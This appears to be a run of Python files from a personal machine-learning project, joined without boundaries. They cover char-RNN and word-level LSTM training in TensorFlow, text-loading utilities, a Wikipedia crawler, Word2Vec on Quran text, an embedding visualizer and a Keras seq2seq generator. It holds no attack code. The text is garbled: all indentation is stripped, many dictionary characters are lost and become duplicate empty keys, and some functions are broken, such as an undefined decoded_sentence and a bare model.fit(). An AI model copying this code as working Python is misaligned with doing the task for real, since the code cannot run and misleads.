def __init__(self, num_classes, batch_size=64, num_steps=50,
lstm_size=128, num_layers=2, learning_rate=0.001,
grad_clip=5, sampling=False):
# When we're using this network for sampling later, we'll be passing in
# one character at a time, so providing an option for that
if sampling:
batch_size, num_steps = 1, 1
else:
batch_size, num_steps = batch_size, num_steps
tf.reset_default_graph()
# Build the input placeholder tensors
self.inputs, self.targets, self.keep_prob = build_inputs(batch_size, num_steps)
# Build the LSTM cell
# (lstm_size, num_layers, batch_size, keep_prob)
cell, self.initial_state = build_lstm(lstm_size, num_layers, batch_size, self.keep_prob)
### Run the data through the RNN layers
# First, one-hot encode the input tokens
x_one_hot = tf.one_hot(self.inputs, num_classes)
# Run each sequence step through the RNN with tf.nn.dynamic_rnn
outputs, state = tf.nn.dynamic_rnn(cell, x_one_hot, initial_state=self.initial_state)
self.final_state = state
# Get softmax predictions and logits
# (lstm_output, in_size, out_size)
# There are lstm_size nodes in hidden layers, and the number
# of the total characters as num_classes (i.e output layer)
self.prediction, self.logits = build_output(outputs, lstm_size, num_classes)
# Loss and optimizer (with gradient clipping)
# (logits, targets, lstm_size, num_classes)
self.loss = build_loss(self.logits, self.targets, num_classes)
# (loss, learning_rate, grad_clip)
self.optimizer = build_optimizer(self.loss, learning_rate, grad_clip)
from time import perf_counter
from collections import namedtuple
from parameters import *
from train import *
from utils import get_time, get_text
import tqdm
import numpy as np
import os
import string
import tensorflow as tf
if __name__ == "__main__":
CHECKPOINT = "checkpoints"
if not os.path.isdir(CHECKPOINT):
os.mkdir(CHECKPOINT)
vocab, int2char, char2int, text = get_text(char_level=True,
files=["E:\\datasets\\python_code_small.py", "E:\\datasets\\my_python_code.py"],
load=False,
lower=False,
save_index=4)
print(char2int)
encoded = np.array([char2int[c] for c in text])
print("[*] Total characters :", len(text))
print("[*] Number of classes :", len(vocab))
model = CharRNN(num_classes=len(vocab), batch_size=batch_size, num_steps=num_steps,
lstm_size=lstm_size, num_layers=num_layers,
learning_rate=learning_rate)
saver = tf.train.Saver(max_to_keep=100)
with tf.Session(config=tf.ConfigProto(intra_op_parallelism_threads=NUM_THREADS)) as sess:
sess.run(tf.global_variables_initializer())
# Use the line below to load a checkpoint and resume training
saver.restore(sess, f'{CHECKPOINT}/e13_l256.ckpt')
total_steps = len(encoded) // batch_size // num_steps
for e in range(14, epochs):
# Train network
cs = 0
new_state = sess.run(model.initial_state)
min_loss = np.inf
batches = tqdm.tqdm(get_batches(encoded, batch_size, num_steps),
f"Epoch= {e+1}/{epochs} - {cs}/{total_steps}",
total=total_steps)
for x, y in batches:
cs += 1
start = perf_counter()
feed = {model.inputs: x,
model.targets: y,
model.keep_prob: keep_prob,
model.initial_state: new_state}
batch_loss, new_state, _ = sess.run([model.loss,
model.final_state,
model.optimizer],
feed_dict=feed)
batches.set_description(f"Epoch: {e+1}/{epochs} - {cs}/{total_steps} loss:{batch_loss:.2f}")
saver.save(sess, f"{CHECKPOINT}/e{e}_l{lstm_size}.ckpt")
print("Loss:", batch_loss)
saver.save(sess, f"{CHECKPOINT}/i{cs}_l{lstm_size}.ckpt")
from time import perf_counter
from collections import namedtuple
from colorama import Fore, init
# local
from parameters import *
from train import *
from utils import get_time, get_text
init()
GREEN = Fore.GREEN
RESET = Fore.RESET
import numpy as np
import os
import tensorflow as tf
import string
CHECKPOINT = "checkpoints_words"
files = ["carroll-alice.txt", "text.txt", "text8.txt"]
if not os.path.isdir(CHECKPOINT):
os.mkdir(CHECKPOINT)
vocab, int2word, word2int, text = get_text("data", files=files)
encoded = np.array([word2int[w] for w in text])
del text
if __name__ == "__main__":
def calculate_time():
global time_took
global start
global total_time_took
global times_took
global avg_time_took
global time_estimated
global total_steps
time_took = perf_counter() - start
total_time_took += time_took
times_took.append(time_took)
avg_time_took = sum(times_took) / len(times_took)
time_estimated = total_steps * avg_time_took - total_time_took
model = CharRNN(num_classes=len(vocab), batch_size=batch_size, num_steps=num_steps,
lstm_size=lstm_size, num_layers=num_layers,
learning_rate=learning_rate)
saver = tf.train.Saver(max_to_keep=100)
with tf.Session(config=tf.ConfigProto(intra_op_parallelism_threads=NUM_THREADS)) as sess:
sess.run(tf.global_variables_initializer())
# Use the line below to load a checkpoint and resume training
# saver.restore(sess, f'{CHECKPOINT}/i3524_l128_loss=1.36.ckpt')
# calculate total steps
total_steps = epochs * len(encoded) / (batch_size * num_steps)
time_estimated = "N/A"
times_took = []
total_time_took = 0
current_steps = 0
progress_percentage = 0
for e in range(epochs):
# Train network
new_state = sess.run(model.initial_state)
min_loss = np.inf
for x, y in get_batches(encoded, batch_size, num_steps):
current_steps += 1
start = perf_counter()
feed = {model.inputs: x,
model.targets: y,
model.keep_prob: keep_prob,
model.initial_state: new_state}
batch_loss, new_state, _ = sess.run([model.loss,
model.final_state,
model.optimizer],
feed_dict=feed)
progress_percentage = current_steps * 100 / total_steps
if batch_loss < min_loss:
# saver.save(sess, f"{CHECKPOINT}/i{current_steps}_l{lstm_size}_loss={batch_loss:.2f}.ckpt")
min_loss = batch_loss
calculate_time()
print(f'{GREEN}[{progress_percentage:.2f}%] Epoch: {e+1:3}/{epochs} Training loss: {batch_loss:2.4f} - {time_took:2.4f} s/batch - ETA: {get_time(time_estimated)}{RESET}')
continue
if (current_steps % print_every_n == 0):
calculate_time()
print(f'[{progress_percentage:.2f}%] Epoch: {e+1:3}/{epochs} Training loss: {batch_loss:2.4f} - {time_took:2.4f} s/batch - ETA: {get_time(time_estimated)}', end='\r')
if (current_steps % save_every_n == 0):
saver.save(sess, f"{CHECKPOINT}/i{current_steps}_l{lstm_size}.ckpt")
saver.save(sess, f"{CHECKPOINT}/i{current_steps}_l{lstm_size}.ckpt")
import tqdm
import os
import inflect
import glob
import pickle
import sys
from string import punctuation, whitespace
p = inflect.engine()
UNK = "<unk>"
char2int_target = {'\t': 0, '\n': 1, '\x0c': 2, ' ': 3, '!': 4, '"': 5, '#': 6, '': 7, '%': 8, '&': 9, "'": 10, '(': 11, ')': 12, '*': 13, '+': 14, ',': 15, '-': 16, '.': 17,
'/': 18, '0': 19, '1': 20, '2': 21, '3': 22, '4': 23, '5': 24, '6': 25, '7': 26, '8': 27, '9': 28, ':': 29, '': 30, '<': 31, '=': 32, '>': 33, '?': 34, '':
35, 'A': 36, 'B': 37, 'C': 38, 'D': 39, 'E': 40, 'F': 41, 'G': 42, 'H': 43, 'I': 44, 'J': 45, 'K': 46, 'L': 47, 'M': 48, 'N': 49, 'O': 50, 'P': 51, 'Q': 52, 'R': 53, 'S': 54, 'T': 55, 'U': 56, 'V': 57, 'W': 58, 'X': 59, 'Y': 60, 'Z': 61, '[': 62, '\\': 63, ']': 64, '^': 65, '_': 66, '': 67, 'a': 68, 'b': 69, 'c':
70, 'd': 71, 'e': 72, 'f': 73, 'g': 74, 'h': 75, 'i': 76, 'j': 77, 'k': 78, 'l': 79, 'm': 80, 'n': 81, 'o': 82, 'p': 83, 'q': 84, 'r': 85, 's': 86, 't': 87, 'u': 88, 'v': 89, 'w': 90, 'x': 91, 'y': 92, 'z': 93, '{': 94, '|': 95, '}': 96, '': 97, '': 98, '': 99, '': 100, '': 101, '': 102, '': 103, '': 104, '': 105, '\xad': 106, '': 107, '': 108, '': 109, '': 110, '': 111, '': 112, '': 113, '': 114, '': 115, '': 116, '': 117, '': 118, '': 119, '': 120, '': 121, '': 122, '': 123, '': 124, '': 125, '': 126, '': 127, '': 128, '': 129, '': 130, '': 131, '': 132, '': 133, '': 134, '': 135, '': 136, '': 137, '': 138, '': 139, '': 140, '': 141, '': 142, '': 143, '': 144, '': 145, '': 146, '': 147, '': 148, '': 149, '': 150, '': 151, '': 152, '': 153, '': 154, '': 155, '': 156, '': 157, '': 158, '': 159, '': 160, '': 161, '': 162, '': 163, '': 164, '': 165, '': 166, '': 167,
'': 168, '': 169, '': 170, '': 171, '': 172, '': 173, '': 174, '': 175, '': 176, '': 177, '': 178, '': 179, '': 180, '': 181, '': 182, '': 183, '': 184, '': 185, '': 186, '': 187, '': 188, '': 189, '': 190, '': 191, '': 192}
def get_time(seconds, form="{hours:02}:{minutes:02}:{seconds:02}"):
try:
seconds = int(seconds)
except:
return seconds
minutes, seconds = divmod(seconds, 60)
hours, minutes = divmod(minutes, 60)
days, hours = divmod(hours, 24)
months, days = divmod(days, 30)
years, months = divmod(months, 12)
if days:
form = "{days}d " + form
if months:
form = "{months}m " + form
elif years:
form = "{years}y " + form
return form.format(**locals())
def get_text(path="data",
files=["carroll-alice.txt", "text.txt", "text8.txt"],
load=True,
char_level=False,
lower=True,
save=True,
save_index=1):
if load:
# check if any pre-cleaned saved data exists first
pickle_files = glob.glob(os.path.join(path, "text_data*.pickle"))
if len(pickle_files) == 1:
return pickle.load(open(pickle_files[0], "rb"))
elif len(pickle_files) > 1:
sizes = [ get_size(os.path.getsize(p)) for p in pickle_files ]
s = ""
for i, (file, size) in enumerate(zip(pickle_files, sizes), start=1):
s += str(i) + " - " + os.path.basename(file) + f" ({size}) \n"
choice = int(input(f"""Multiple data corpus found:
{s}
99 - use and clean .txt files
Please choose one: """))
if choice != 99:
chosen_file = pickle_files[choice-1]
print("[*] Loading pickled data...")
return pickle.load(open(chosen_file, "rb"))
text = ""
for file in tqdm.tqdm(files, "Loading data"):
file = os.path.join(path, file)
with open(file) as f:
if lower:
text += f.read().lower()
else:
text += f.read()
print(len(text))
punc = set(punctuation)
# text = ''.join([ c for c in tqdm.tqdm(text, "Cleaning text") if c not in punc ])
text = ''.join([ c for c in tqdm.tqdm(text, "Cleaning text") if c in char2int_target ])
# for ws in whitespace:
# text = text.replace(ws, " ")
if char_level:
text = list(text)
else:
text = text.split()
# new_text = []
new_text = text
# append = new_text.append
# co = 0
# if char_level:
# k = 0
# for i in tqdm.tqdm(range(len(text)), "Normalizing words"):
# if not text[i].isdigit():
# append(text[i])
# k = 0
# else:
# # if this digit is mapped to a word already using
# # the below method, then just continue
# if k >= 1:
# k -= 1
# continue
# # if there are more digits following this character
# # k = 0
# digits = ""
# while text[i+k].isdigit():
# digits += text[i+k]
# k += 1
# w = p.number_to_words(digits).replace("-", " ").replace(",", "")
# for c in w:
# append(c)
# co += 1
# else:
# for i in tqdm.tqdm(range(len(text)), "Normalizing words"):
# # convert digits to words
# # (i.e '7' to 'seven')
# if text[i].isdigit():
# text[i] = p.number_to_words(text[i]).replace("-", " ")
# append(text[i])
# co += 1
# else:
# append(text[i])
vocab = sorted(set(new_text))
print(f"alices in vocab:", "alices" in vocab)
# print(f"Converted {co} digits to words.")
print(f"Total vocabulary size:", len(vocab))
int2word = { i:w for i, w in enumerate(vocab) }
word2int = { w:i for i, w in enumerate(vocab) }
if save:
pickle_filename = os.path.join(path, f"text_data_{save_index}.pickle")
print("Pickling data for future use to", pickle_filename)
pickle.dump((vocab, int2word, word2int, new_text), open(pickle_filename, "wb"))
return vocab, int2word, word2int, new_text
def get_size(size, suffix="B"):
factor = 1024
for unit in ['', 'K', 'M', 'G', 'T', 'P']:
if size < factor:
return "{:.2f}{}{}".format(size, unit, suffix)
size /= factor
return "{:.2f}{}{}".format(size, "E", suffix)
import wikipedia
from threading import Thread
def gather(page_name):
print(f"Crawling {page_name}")
page = wikipedia.page(page_name)
filename = page_name.replace(" ", "_")
print(page.content, file=open(f"data/{filename}.txt", 'w', encoding="utf-8"))
print(f"Done crawling {page_name}")
for i in range(5):
Thread(target=gather, args=(page.links[i],)).start()
if __name__ == "__main__":
pages = ["Relativity"]
for page in pages:
gather(page)
# from keras.preprocessing.text import Tokenizer
from utils import chunk_seq
from collections import Counter
from nltk.corpus import stopwords
from keras.preprocessing.sequence import pad_sequences
import numpy as np
import gensim
sequence_length = 200
embedding_dim = 200
# window_size = 7
# vector_dim = 300
# epochs = 1000
# valid_size = 16 # Random set of words to evaluate similarity on.
# valid_window = 100 # Only pick dev samples in the head of the distribution.
# valid_examples = np.random.choice(valid_window, valid_size, replace=False)
with open("data/quran_cleaned.txt", encoding="utf8") as f:
text = f.read()
# print(text[:500])
ayat = text.split(".")
words = []
for ayah in ayat:
words.append(ayah.split())
# print(words[:5])
# stop words
stop_words = stopwords.words("arabic")
# most common come at the top
# vocab = [ w[0] for w in Counter(words).most_common() if w[0] not in stop_words]
# words = [ word for word in words if word not in stop_words]
new_words = []
for ayah in words:
new_words.append([ w for w in ayah if w not in stop_words])
# print(len(vocab))
# n = len(words) / sequence_length
# # split text to n sequences
# print(words[:10])
# words = chunk_seq(words, len(ayat))
vocab = []
for ayah in new_words:
for w in ayah:
vocab.append(w)
vocab = sorted(set(vocab))
vocab2int = {w: i for i, w in enumerate(vocab, start=1)}
int2vocab = {i: w for i, w in enumerate(vocab, start=1)}
encoded_words = []
for ayah in new_words:
encoded_words.append([ vocab2int[w] for w in ayah ])
encoded_words = pad_sequences(encoded_words)
# print(encoded_words[10])
words = []
for seq in encoded_words:
words.append([ int2vocab[w] if w != 0 else "_unk_" for w in seq ])
# print(words[:5])
# # define model
print("Training Word2Vec Model...")
model = gensim.models.Word2Vec(sentences=words, size=embedding_dim, workers=7, min_count=1, window=6)
path_to_save = r"E:\datasets\word2vec_quran.txt"
print("Saving model...")
model.wv.save_word2vec_format(path_to_save, binary=False)
# print(dir(model))
from keras.layers import Embedding, LSTM, Dense, Activation, BatchNormalization
from keras.layers import Flatten
from keras.models import Sequential
from preprocess import words, vocab, sequence_length, sequences, vector_dim
from preprocess import window_size
model = Sequential()
model.add(Embedding(len(vocab), vector_dim, input_length=sequence_length))
model.add(Flatten())
model.add(Dense(1))
model.compile("adam", "binary_crossentropy")
model.fit()
def chunk_seq(seq, num):
avg = len(seq) / float(num)
out = []
last = 0.0
while last < len(seq):
out.append(seq[int(last):int(last + avg)])
last += avg
return out
def encode_words(words, vocab2int):
# encoded = [ vocab2int[word] for word in words ]
encoded = []
append = encoded.append
for word in words:
c = vocab2int.get(word)
if c:
append(c)
return encoded
def remove_stop_words(vocab):
# remove stop words
vocab.remove("the")
vocab.remove("of")
vocab.remove("and")
vocab.remove("in")
vocab.remove("a")
vocab.remove("to")
vocab.remove("is")
vocab.remove("as")
vocab.remove("for")
# encoding: utf-8
"""
author: BrikerMan
contact: eliyar917gmail.com
blog: https://eliyar.biz
version: 1.0
license: Apache Licence
file: w2v_visualizer.py
time: 2017/7/30 9:37
"""
import sys
import os
import pathlib
import numpy as np
from gensim.models.keyedvectors import KeyedVectors
import tensorflow as tf
from tensorflow.contrib.tensorboard.plugins import projector
def visualize(model, output_path):
meta_file = "w2x_metadata.tsv"
placeholder = np.zeros((len(model.wv.index2word), model.vector_size))
with open(os.path.join(output_path, meta_file), 'wb') as file_metadata:
for i, word in enumerate(model.wv.index2word):
placeholder[i] = model[word]
# temporary solution for https://github.com/tensorflow/tensorflow/issues/9094
if word == '':
print("Emply Line, should replecaed by any thing else, or will cause a bug of tensorboard")
file_metadata.write("{0}".format('<Empty Line>').encode('utf-8') + b'\n')
else:
file_metadata.write("{0}".format(word).encode('utf-8') + b'\n')
# define the model without training
sess = tf.InteractiveSession()
embedding = tf.Variable(placeholder, trainable=False, name='w2x_metadata')
tf.global_variables_initializer().run()
saver = tf.train.Saver()
writer = tf.summary.FileWriter(output_path, sess.graph)
# adding into projector
config = projector.ProjectorConfig()
embed = config.embeddings.add()
embed.tensor_name = 'w2x_metadata'
embed.metadata_path = meta_file
# Specify the width and height of a single thumbnail.
projector.visualize_embeddings(writer, config)
saver.save(sess, os.path.join(output_path, 'w2x_metadata.ckpt'))
print('Run tensorboard --logdir={0} to run visualize result on tensorboard'.format(output_path))
if __name__ == "__main__":
"""
Use model.save_word2vec_format to save w2v_model as word2evc format
Then just run python w2v_visualizer.py word2vec.text visualize_result
"""
try:
model_path = sys.argv[1]
output_path = sys.argv[2]
except:
print("Please provice model path and output path")
model = KeyedVectors.load_word2vec_format(model_path)
pathlib.Path(output_path).mkdir(parents=True, exist_ok=True)
visualize(model, output_path)
from keras.preprocessing.text import Tokenizer
from keras.preprocessing.sequence import pad_sequences
from keras.utils import to_categorical
import numpy as np
import pickle
import tqdm
class NMTGenerator:
"""A class utility for generating Neural-Machine-Translation large datasets"""
def __init__(self, source_file, target_file, num_encoder_tokens=None, num_decoder_tokens=None,
source_sequence_length=None, target_sequence_length=None, x_tk=None, y_tk=None,
batch_size=256, validation_split=0.15, load_tokenizers=False, dump_tokenizers=True,
same_tokenizer=False, char_level=False, verbose=0):
self.source_file = source_file
self.target_file = target_file
self.same_tokenizer = same_tokenizer
self.char_level = char_level
if not load_tokenizers:
# x ( source ) tokenizer
self.x_tk = x_tk if x_tk else Tokenizer(char_level=self.char_level)
# y ( target ) tokenizer
self.y_tk = y_tk if y_tk else Tokenizer(char_level=self.char_level)
else:
self.x_tk = pickle.load(open("results/x_tk.pickle", "rb"))
self.y_tk = pickle.load(open("results/y_tk.pickle", "rb"))
# remove '?' and '.' from filters
# which means include them in vocabulary
# add "'" to filters
self.x_tk.filters = self.x_tk.filters.replace("?", "").replace("_", "") + "'"
self.y_tk.filters = self.y_tk.filters.replace("?", "").replace("_", "") + "'"
if char_level:
self.x_tk.filters = self.x_tk.filters.replace(".", "").replace(",", "")
self.y_tk.filters = self.y_tk.filters.replace(".", "").replace(",", "")
if same_tokenizer:
self.y_tk = self.x_tk
# max sequence length of source language
self.source_sequence_length = source_sequence_length
# max sequence length of target language
self.target_sequence_length = target_sequence_length
# vocab size of encoder
self.num_encoder_tokens = num_encoder_tokens
# vocab size of decoder
self.num_decoder_tokens = num_decoder_tokens
# the batch size
self.batch_size = batch_size
# the ratio which the dataset will be partitioned
self.validation_split = validation_split
# whether to dump x_tk and y_tk when finished tokenizing
self.dump_tokenizers = dump_tokenizers
# cap to remove _unk_ samples
self.n_unk_to_remove = 2
self.verbose = verbose
def load_dataset(self):
"""Loads the dataset:
1. load the data from files
2. tokenize and calculate sequence lengths and num_tokens
3. post pad the sequences"""
self.load_data()
if self.verbose:
print("[+] Data loaded")
self.tokenize()
if self.verbose:
print("[+] Text tokenized")
self.pad_sequences()
if self.verbose:
print("[+] Sequences padded")
self.split_data()
if self.verbose:
print("[+] Data splitted")
def load_data(self):
"""Loads data from files"""
self.X = load_data(self.source_file)
self.y = load_data(self.target_file)
# remove much unks on a single sample
X, y = [], []
co = 0
for question, answer in zip(self.X, self.y):
if question.count("_unk_") >= self.n_unk_to_remove or answer.count("_unk_") >= self.n_unk_to_remove:
co += 1
else:
X.append(question)
y.append(answer)
self.X = X
self.y = y
if self.verbose >= 1:
print("[*] Number of samples:", len(self.X))
if self.verbose >= 2:
print("[!] Number of samples deleted:", co)
def tokenize(self):
"""Tokenizes sentences/strings as well as calculating input/output sequence lengths
and input/output vocab sizes"""
self.x_tk.fit_on_texts(self.X)
self.y_tk.fit_on_texts(self.y)
self.X = self.x_tk.texts_to_sequences(self.X)
self.y = self.y_tk.texts_to_sequences(self.y)
# calculate both sequence lengths ( source and target )
self.source_sequence_length = max([len(x) for x in self.X])
self.target_sequence_length = max([len(x) for x in self.y])
# calculating number of encoder/decoder vocab sizes
self.num_encoder_tokens = len(self.x_tk.index_word) + 1
self.num_decoder_tokens = len(self.y_tk.index_word) + 1
# dump tokenizers
pickle.dump(self.x_tk, open("results/x_tk.pickle", "wb"))
pickle.dump(self.y_tk, open("results/y_tk.pickle", "wb"))
def pad_sequences(self):
"""Pad sequences"""
self.X = pad_sequences(self.X, maxlen=self.source_sequence_length, padding='post')
self.y = pad_sequences(self.y, maxlen=self.target_sequence_length, padding='post')
def split_data(self):
"""split training/validation sets using self.validation_split"""
split_value = int(len(self.X)*self.validation_split)
self.X_test = self.X[:split_value]
self.X_train = self.X[split_value:]
self.y_test = self.y[:split_value]
self.y_train = self.y[split_value:]
# free up memory
del self.X
del self.y
def shuffle_data(self, train=True):
"""Shuffles X and y together
:params train (bool): whether to shuffle training data, default is True
Note that when train is False, testing data is shuffled instead."""
state = np.random.get_state()
if train:
np.random.shuffle(self.X_train)
np.random.set_state(state)
np.random.shuffle(self.y_train)
else:
np.random.shuffle(self.X_test)
np.random.set_state(state)
np.random.shuffle(self.y_test)
def next_train(self):
"""Training set generator"""
return self.generate_batches(self.X_train, self.y_train, train=True)
def next_validation(self):
"""Validation set generator"""
return self.generate_batches(self.X_test, self.y_test, train=False)
def generate_batches(self, X, y, train=True):
"""Data generator"""
same_tokenizer = self.same_tokenizer
batch_size = self.batch_size
char_level = self.char_level
source_sequence_length = self.source_sequence_length
target_sequence_length = self.target_sequence_length
if same_tokenizer:
num_encoder_tokens = max([self.num_encoder_tokens, self.num_decoder_tokens])
num_decoder_tokens = num_encoder_tokens
else:
num_encoder_tokens = self.num_encoder_tokens
num_decoder_tokens = self.num_decoder_tokens
while True:
for j in range(0, len(X), batch_size):
encoder_input_data = X[j: j+batch_size]
decoder_input_data = y[j: j+batch_size]
# update batch size ( different size in last batch of the dataset )
batch_size = encoder_input_data.shape[0]
if self.char_level:
encoder_data = np.zeros((batch_size, source_sequence_length, num_encoder_tokens))
decoder_data = np.zeros((batch_size, target_sequence_length, num_decoder_tokens))
else:
encoder_data = encoder_input_data
decoder_data = decoder_input_data
decoder_target_data = np.zeros((batch_size, target_sequence_length, num_decoder_tokens))
if char_level:
# if its char level, one-hot all sequences of characters
for i, sequence in enumerate(decoder_input_data):
for t, word_index in enumerate(sequence):
if t > 0:
decoder_target_data[i, t - 1, word_index] = 1
decoder_data[i, t, word_index] = 1
for i, sequence in enumerate(encoder_input_data):
for t, word_index in enumerate(sequence):
encoder_data[i, t, word_index] = 1
else:
# if its word level, one-hot only target_data ( the one compared with dense )
for i, sequence in enumerate(decoder_input_data):
for t, word_index in enumerate(sequence):
if t > 0:
decoder_target_data[i, t - 1, word_index] = 1
yield ([encoder_data, decoder_data], decoder_target_data)
# shuffle data when an epoch is finished
self.shuffle_data(train=train)
def get_embedding_vectors(tokenizer):
embedding_index = {}
with open("data/glove.6B.300d.txt", encoding='utf8') as f:
for line in tqdm.tqdm(f, "Reading GloVe"):
values = line.split()
word = values[0]
vectors = np.asarray(values[1:], dtype='float32')
embedding_index[word] = vectors
word_index = tokenizer.word_index
embedding_matrix = np.zeros((len(word_index)+1, 300))
for word, i in word_index.items():
embedding_vector = embedding_index.get(word)
if embedding_vector is not None:
# words not found will be 0s
embedding_matrix[i] = embedding_vector
return embedding_matrix
def load_data(filename):
text = []
append = text.append
with open(filename) as f:
for line in tqdm.tqdm(f, f"Reading {filename}"):
line = line.strip()
append(line)
return text
# def generate_batch(X, y, num_decoder_tokens, max_length_src, max_length_target, batch_size=256):
# """Generating data"""
# while True:
# for j in range(0, len(X), batch_size):
# encoder_input_data = np.zeros((batch_size, max_length_src), dtype='float32')
# decoder_input_data = np.zeros((batch_size, max_length_target), dtype='float32')
# decoder_target_data = np.zeros((batch_size, max_length_target, num_decoder_tokens), dtype='float32')
# for i, (input_text, target_text) in enumerate(zip(X[j: j+batch_size], y[j: j+batch_size])):
# for t, word in enumerate(input_text.split()):
# encoder_input_data[i, t] = input_word_index[word] # encoder input sequence
# for t, word in enumerate(target_text.split()):
# if t > 0:
# # offset by one timestep
# # one-hot encoded
# decoder_target_data[i, t-1, target_token_index[word]] = 1
# if t < len(target_text.split()) - 1:
# decoder_input_data[i, t] = target_token_index[word]
# yield ([encoder_input_data, decoder_input_data], decoder_target_data)
# def tokenize(x, tokenizer=None):
# """Tokenize x
# :param x: List of sentences/strings to be tokenized
# :return: Tuple of (tokenized x data, tokenizer used to tokenize x)"""
# if tokenizer:
# t = tokenizer
# else:
# t = Tokenizer()
# t.fit_on_texts(x)
# return t.texts_to_sequences(x), t
# def pad(x, length=None):
# """Pad x
# :param x: list of sequences
# :param length: Length to pad the sequence to, If None, use length
# of longest sequence in x.
# :return: Padded numpy array of sequences"""
# return pad_sequences(x, maxlen=length, padding="post")
# def preprocess(x, y):
# """Preprocess x and y
# :param x: Feature list of sentences
# :param y: Label list of sentences
# :return: Tuple of (preprocessed x, preprocessed y, x tokenizer, y tokenizer)"""
# preprocess_x, x_tk = tokenize(x)
# preprocess_y, y_tk = tokenize(y)
# preprocess_x2 = [ [0] + s for s in preprocess_y ]
# longest_x = max([len(i) for i in preprocess_x])
# longest_y = max([len(i) for i in preprocess_y]) + 1
# # max_length = len(x_tk.word_index) if len(x_tk.word_index) > len(y_tk.word_index) else len(y_tk.word_index)
# max_length = longest_x if longest_x > longest_y else longest_y
# preprocess_x = pad(preprocess_x, length=max_length)
# preprocess_x2 = pad(preprocess_x2, length=max_length)
# preprocess_y = pad(preprocess_y, length=max_length)
# # preprocess_x = to_categorical(preprocess_x)
# # preprocess_x2 = to_categorical(preprocess_x2)
# preprocess_y = to_categorical(preprocess_y)
# return preprocess_x, preprocess_x2, preprocess_y, x_tk, y_tk
from keras.layers import Embedding, TimeDistributed, Dense, GRU, LSTM, Input
from keras.models import Model, Sequential
from keras.utils import to_categorical
import numpy as np
import tqdm
def encoder_decoder_model(num_encoder_tokens, latent_dim, num_decoder_tokens, embedding_matrix=None, embedding_layer=True):
# ENCODER
# define an input sequence and process it
if embedding_layer:
encoder_inputs = Input(shape=(None,))
if embedding_matrix is None:
encoder_emb_layer = Embedding(num_encoder_tokens, latent_dim, mask_zero=True)
else:
encoder_emb_layer = Embedding(num_encoder_tokens,
latent_dim,
mask_zero=True,
weights=[embedding_matrix],
trainable=False)
encoder_emb = encoder_emb_layer(encoder_inputs)
else:
encoder_inputs = Input(shape=(None, num_encoder_tokens))
encoder_emb = encoder_inputs
encoder_lstm = LSTM(latent_dim, return_state=True)
encoder_outputs, state_h, state_c = encoder_lstm(encoder_emb)
# we discard encoder_outputs and only keep the states
encoder_states = [state_h, state_c]
# DECODER
# Set up the decoder, using encoder_states as initial state
if embedding_layer:
decoder_inputs = Input(shape=(None,))
else:
decoder_inputs = Input(shape=(None, num_encoder_tokens))
# add an embedding layer
# decoder_emb_layer = Embedding(num_decoder_tokens, latent_dim, mask_zero=True)
if embedding_layer:
decoder_emb = encoder_emb_layer(decoder_inputs)
else:
decoder_emb = decoder_inputs
# we set up our decoder to return full output sequences
# and to return internal states as well, we don't use the
# return states in the training model, but we will use them in inference
decoder_lstm = LSTM(latent_dim, return_sequences=True, return_state=True)
decoder_outputs, _, _, = decoder_lstm(decoder_emb, initial_state=encoder_states)
# dense output layer used to predict each character ( or word )
# in one-hot manner, not recursively
decoder_dense = Dense(num_decoder_tokens, activation="softmax")
decoder_outputs = decoder_dense(decoder_outputs)
# finally, the model is defined with inputs for the encoder and the decoder
# and the output target sequence
# turn encoder_input_data & decoder_input_data into decoder_target_data
model = Model([encoder_inputs, decoder_inputs], output=decoder_outputs)
# model.summary()
# define encoder inference model
encoder_model = Model(encoder_inputs, encoder_states)
# define decoder inference model
decoder_state_input_h = Input(shape=(latent_dim,))
decoder_state_input_c = Input(shape=(latent_dim,))
decoder_states_inputs = [decoder_state_input_h, decoder_state_input_c]
# Get the embeddings of the decoder sequence
if embedding_layer:
dec_emb2 = encoder_emb_layer(decoder_inputs)
else:
dec_emb2 = decoder_inputs
decoder_outputs, state_h, state_c = decoder_lstm(dec_emb2, initial_state=decoder_states_inputs)
decoder_states = [state_h, state_c]
decoder_outputs = decoder_dense(decoder_outputs)
decoder_model = Model([decoder_inputs] + decoder_states_inputs, [decoder_outputs] + decoder_states)
return model, encoder_model, decoder_model
def predict_sequence(enc, dec, source, n_steps, cardinality, char_level=False):
"""Generate target given source sequence, this function can be used
after the model is trained to generate a target sequence given a source sequence."""
# encode
state = enc.predict(source)
# start of sequence input
if char_level:
target_seq = np.zeros((1, 1, 61))
else:
target_seq = np.zeros((1, 1))
# collect predictions
output = []
for t in range(n_steps):
# predict next char
yhat, h, c = dec.predict([target_seq] + state)
# store predictions
y = yhat[0, 0, :]
if char_level:
sampled_token_index = to_categorical(np.argmax(y), num_classes=61)
else:
sampled_token_index = np.argmax(y)
output.append(sampled_token_index)
# update state
state = [h, c]
# update target sequence
if char_level:
target_seq = np.zeros((1, 1, 61))
else:
target_seq = np.zeros((1, 1))
target_seq[0, 0] = sampled_token_index
return np.array(output)
def decode_sequence(enc, dec, input_seq):
# Encode the input as state vectors.
states_value = enc.predict(input_seq)
# Generate empty target sequence of length 1.
target_seq = np.zeros((1,1))
# Populate the first character of target sequence with the start character.
target_seq[0, 0] = 0
# Sampling loop for a batch of sequences
# (to simplify, here we assume a batch of size 1).
stop_condition = False
decoded_sequence = []
while not stop_condition:
output_tokens, h, c = dec.predict([target_seq] + states_value)
# Sample a token
sampled_token_index = np.argmax(output_tokens[0, -1, :])
# sampled_char = reverse_target_char_index[sampled_token_index]
decoded_sentence.append(output_tokens[0, -1, :])
# Exit condition: either hit max length or find stop token.
if (output_tokens == '<PAD>' or len(decoded_sentence) > 50):
stop_condition = True
# Update the target sequence (of length 1).
target_seq = np.zeros((1,1))
target_seq[0, 0] = sampled_token_index
# Update states
states_value = [h, c]
return decoded_sentence
from keras.preprocessing.text import Tokenizer
from keras.preprocessing.sequence import pad_sequences
from keras.utils import to_categorical
import numpy as np
def tokenize(x, tokenizer=None):
"""Tokenize x
:param x: List of sentences/strings to be tokenized
:return: Tuple of (tokenized x data, tokenizer used to tokenize x)"""
if tokenizer:
t = tokenizer
else:
t = Tokenizer()
t.fit_on_texts(x)
return t.texts_to_sequences(x), t
def pad(x, length=None):
"""Pad x
:param x: list of sequences
:param length: Length to pad the sequence to, If None, use length
of longest sequence in x.
:return: Padded numpy array of sequences"""
return pad_sequences(x, maxlen=length, padding="post")
def preprocess(x, y):
"""Preprocess x and y
:param x: Feature list of sentences
:param y: Label list of sentences
:return: Tuple of (preprocessed x, preprocessed y, x tokenizer, y tokenizer)"""
preprocess_x, x_tk = tokenize(x)
preprocess_y, y_tk = tokenize(y)
preprocess_x2 = [ [0] + s for s in preprocess_y ]
